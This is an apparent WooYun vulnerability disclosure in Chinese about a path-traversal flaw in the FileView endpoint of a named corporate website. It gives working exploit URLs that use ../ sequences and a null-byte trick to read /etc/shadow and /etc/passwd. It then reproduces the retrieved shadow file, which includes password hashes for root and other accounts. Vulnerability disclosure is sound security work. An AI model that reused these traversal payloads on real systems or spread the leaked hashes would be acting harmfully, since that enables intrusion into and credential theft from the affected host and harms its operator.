WooYun.org

问题站点：
http://global.midea.com.cn/midea/

看到有两个文件：download.jsp与FileView，但download没有测试成功，FileView可用：
http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/shadow%00.jpg
会看到有个图片：

下载图片用记事本打开：
root:$1$MiYaiGJD$YjEG1eOtDo0kz/oytKc.w1:15684:0:99999:7:::
bin:*:13842:0:99999:7:::
daemon:*:13842:0:99999:7:::
adm:*:13842:0:99999:7:::
lp:*:13842:0:99999:7:::
sync:*:13842:0:99999:7:::
shutdown:*:13842:0:99999:7:::
halt:*:13842:0:99999:7:::
mail:*:13842:0:99999:7:::
news:*:13842:0:99999:7:::
uucp:*:13842:0:99999:7:::
operator:*:13842:0:99999:7:::
games:*:13842:0:99999:7:::
gopher:*:13842:0:99999:7:::
ftp:*:13842:0:99999:7:::
nobody:*:13842:0:99999:7:::
dbus:!!:13842:0:99999:7:::
vcsa:!!:13842:0:99999:7:::
rpm:!!:13842:0:99999:7:::
haldaemon:!!:13842:0:99999:7:::
netdump:!!:13842:0:99999:7:::
nscd:!!:13842:0:99999:7:::
sshd:!!:13842:0:99999:7:::
rpc:!!:13842:0:99999:7:::
mailnull:!!:13842:0:99999:7:::
smmsp:!!:13842:0:99999:7:::
rpcuser:!!:13842:0:99999:7:::
nfsnobody:!!:13842:0:99999:7:::
pcap:!!:13842:0:99999:7:::
apache:!!:13842:0:99999:7:::
squid:!!:13842:0:99999:7:::
webalizer:!!:13842:0:99999:7:::
xfs:!!:13842:0:99999:7:::
ntp:!!:13842:0:99999:7:::
gdm:!!:13842:0:99999:7:::
pegasus:!!:13842:0:99999:7:::
htt:!!:13842:0:99999:7:::
amanda:!!:13842:0:99999:7:::
mideaweb:$1$XKjbr6gk$J0i8zKZ9EnbiUzjHPegXh0:14125:0:99999:7:::
mysql:!!:14125:0:99999:7:::
mon:$1$iYho7hfh$k2EgB1X3Ls5L1F9E3e4Xk.:15523:0:99999:7:::
mysql5:!!:15348:0:99999:7:::
http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/passwd%00.jpg